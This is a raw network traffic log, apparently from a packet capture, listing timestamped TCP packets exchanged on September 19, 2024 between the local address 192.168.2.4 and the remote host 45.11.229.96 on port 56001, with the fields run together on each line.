                                Sep 19, 2024 02:25:47.582819939 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582838058 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582870960 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582882881 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582905054 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582953930 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.583177090 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583228111 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583260059 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583272934 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.583364010 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583431959 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583435059 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.583482027 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583529949 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583540916 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.583561897 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583594084 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583604097 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.583625078 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583656073 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583667040 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.583689928 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.583736897 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.584124088 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584175110 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584218979 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.584264994 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584314108 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584357977 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.584362984 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584394932 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584427118 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584438086 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.584459066 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584490061 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584501028 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.584521055 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584553957 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584564924 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.584588051 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.584646940 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.585036993 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585088968 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585120916 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585133076 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.585196018 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585227013 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585239887 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.585259914 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585292101 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585304022 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.585324049 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585355997 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585371017 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.585387945 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585419893 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585437059 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.585452080 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.585494041 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.586082935 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586133957 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586167097 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586179972 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.586199045 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586230993 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586249113 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.586265087 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586297035 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586306095 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.586328030 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586359978 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586369991 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.586390972 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586422920 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586432934 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.586457014 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.586502075 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587053061 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587085962 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587120056 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587131023 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587151051 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587183952 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587193012 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587215900 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587248087 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587260008 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587280035 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587311983 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587323904 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587344885 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587376118 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587420940 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587434053 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587477922 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587790966 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587841034 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587891102 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587886095 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.587939024 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587970018 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.587981939 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588001966 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588033915 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588042974 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588066101 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588099003 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588109970 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588130951 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588162899 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588175058 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588196039 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588247061 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588776112 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588809013 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588840961 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588856936 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588888884 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588920116 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588931084 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.588952065 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.588984013 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.589001894 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.589015961 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.589046955 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.589060068 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.589077950 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.589111090 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.589117050 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.589143991 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.589188099 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.589632034 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.638859987 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.668647051 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.685761929 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.685853004 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.685853958 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.685884953 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.685934067 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.685935974 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.685966015 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686012983 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686017036 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686060905 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686094999 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686117887 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686125040 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686157942 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686182022 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686189890 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686239004 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686243057 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686285973 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686331034 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686332941 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686364889 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686414003 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686433077 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686445951 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686480999 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686487913 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686511993 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686543941 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686558008 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686575890 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686606884 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686625004 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686655998 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686687946 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686705112 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686734915 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686767101 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686783075 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686815023 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686861038 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686861992 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686908960 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686939955 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.686950922 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.686970949 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687002897 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687014103 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687035084 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687067032 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687079906 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687099934 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687134027 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687146902 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687165022 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687196970 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687213898 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687227011 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687259912 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687289953 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687293053 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687321901 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687338114 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687352896 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687401056 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687424898 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687437057 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687469006 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687484980 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687500954 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687530994 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687546015 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687561035 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687608957 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687609911 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687638998 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687684059 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687686920 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687738895 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687771082 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687788010 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687800884 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687848091 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687848091 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687879086 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687911034 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687927008 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.687942028 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687973022 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.687984943 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688004017 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688035011 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688051939 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688065052 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688097954 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688116074 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688128948 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688160896 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688178062 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688190937 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688222885 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688239098 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688254118 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688287973 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688296080 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688318014 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688349962 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688360929 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688380957 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688412905 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688429117 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.688445091 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688477039 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.688493013 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693342924 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693425894 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693444014 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693475962 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693506956 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693553925 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693583012 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693600893 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693631887 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693664074 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693665981 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693695068 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693712950 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693726063 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693773031 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693784952 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693804979 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693815947 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693835974 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693872929 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693878889 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693919897 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693952084 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.693969011 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.693983078 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694015026 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694031000 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694046974 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694077969 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694097996 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694113016 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694144011 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694154978 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694175005 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694205999 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694217920 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694237947 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694269896 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694286108 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694300890 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694353104 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694355011 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694389105 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694421053 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694442034 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.694456100 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.694508076 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.772008896 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772094011 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772125006 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772159100 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772192001 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772201061 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.772201061 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.772224903 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772259951 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.772275925 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.826354980 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.121536970 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.126812935 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:48.126909018 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.127664089 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.132479906 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:48.132539988 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.137675047 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:48.742388010 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:48.742968082 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.747853994 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:48.779694080 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.784815073 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:48.784946918 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:48.789894104 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.338279009 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366655111 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366672993 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366693020 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366741896 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.366741896 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.366764069 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366782904 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366801023 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366821051 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366826057 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.366841078 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366858959 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366874933 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.366878986 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.366904974 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.371707916 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.371727943 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.371746063 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.371769905 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.371808052 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.453401089 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453422070 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453439951 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453490973 CEST4973856001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:52.453608036 CEST560014973845.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:52.453649998 CEST560014973845.11.229.96192.168.2.4
